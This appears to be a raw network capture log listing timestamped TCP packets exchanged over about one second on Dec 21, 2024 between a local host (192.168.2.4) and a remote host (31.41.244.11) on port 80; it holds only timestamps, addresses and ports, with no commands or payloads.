                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.478435040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.478610992 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.617942095 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.617993116 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.618006945 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.618040085 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.618375063 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.618467093 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.618535995 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.618576050 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.619343996 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.619390965 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.619462013 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.619513988 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.620366096 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.620444059 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.620516062 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.620585918 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.621373892 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.621432066 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.621534109 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.621578932 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.622395992 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.622543097 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.622617960 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.622677088 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.623594046 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.623730898 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.623761892 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.623795986 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.624710083 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.624768972 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.624897957 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.624958992 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.625857115 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.625926018 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.626003981 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.626054049 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.627074003 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.627120972 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.627243042 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.627340078 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.628097057 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.628140926 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.628220081 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.628266096 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.628952026 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.628998041 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.629014969 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.629055023 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.629657030 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.629700899 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.629745007 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.629789114 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.630418062 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.630502939 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.630558968 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.630604029 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.631375074 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.631416082 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.631521940 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.631581068 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.632375002 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.632414103 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.632523060 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.632580996 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.633390903 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.633430004 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.633544922 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.633585930 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.634407997 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.634450912 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.634561062 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.634598017 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.635387897 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.635458946 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.635531902 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.635572910 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.636410952 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.636457920 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.636539936 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.636583090 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.637413025 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.637465954 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.637573957 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.637643099 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.638458014 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.638516903 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.638601065 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.638669968 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.639436960 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.639492989 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.639588118 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.639635086 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.640455961 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.640499115 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.640584946 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.640702009 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.641443968 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.641522884 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.641593933 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.641642094 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.642452955 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.642518044 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.642632961 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.642683983 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.643440008 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.643503904 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.643600941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.643652916 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.644468069 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.644515038 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.644615889 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.644659042 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.645441055 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.645486116 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.645598888 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.645643950 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.646467924 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.646511078 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.646810055 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.646856070 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.647524118 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.647573948 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.647620916 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.647671938 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.648487091 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.648658037 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.648669004 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.648705959 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.649471045 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.649513960 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.649759054 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.649802923 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.650501013 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.650552988 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.650670052 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.650823116 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.651489019 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.651535034 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.651648998 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.651736021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.652494907 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.652575970 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.652646065 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.652686119 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.653521061 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.653559923 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.653676987 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.653809071 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.654654980 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.654699087 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.654803991 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.654845953 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.655558109 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.655601025 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.655690908 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.655738115 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.656564951 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.656616926 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.656747103 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.656789064 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.657529116 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.657573938 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.657727003 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.657767057 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.658544064 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.658584118 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.658683062 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.658802986 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.659563065 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.659609079 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.659682035 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.659722090 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.660552979 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.660612106 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.660706043 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.660753012 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.661600113 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.661660910 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.661703110 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.661748886 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.662564993 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.662615061 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.662753105 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.662832975 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.663558006 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.663604021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.663722038 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.663779974 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.664562941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.664634943 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.664720058 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.664797068 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.665575981 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.665637970 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.665682077 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.665749073 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.666591883 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.666662931 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.666716099 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.666760921 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.667681932 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.667733908 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.667926073 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.667973042 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.668587923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.668633938 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.668725967 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.668771029 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.669605017 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.669667959 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.669706106 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.669749975 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.670586109 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.670649052 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.810031891 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.810085058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.810353041 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.810396910 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.810476065 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.810524940 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.810632944 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.810798883 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.811465025 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.811528921 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.811630011 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.811764956 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.812494040 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.812536955 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.812585115 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.812664986 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.813472986 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.813554049 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.813601971 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.813677073 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.814495087 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.814542055 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.814583063 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.814627886 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.815526009 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.815654993 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.815706968 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.816487074 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.816554070 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.816597939 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.816637993 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.817493916 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.817538977 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.817601919 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.817641020 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.818511009 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.818582058 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.818649054 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.818690062 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.819503069 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.819695950 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.819696903 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.819739103 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.820544958 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.820595980 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.820615053 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.820656061 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.821611881 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.821680069 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.821748972 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.821794033 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.822537899 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.822653055 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.822681904 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.822695971 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:37.823549032 CET804979731.41.244.11192.168.2.4
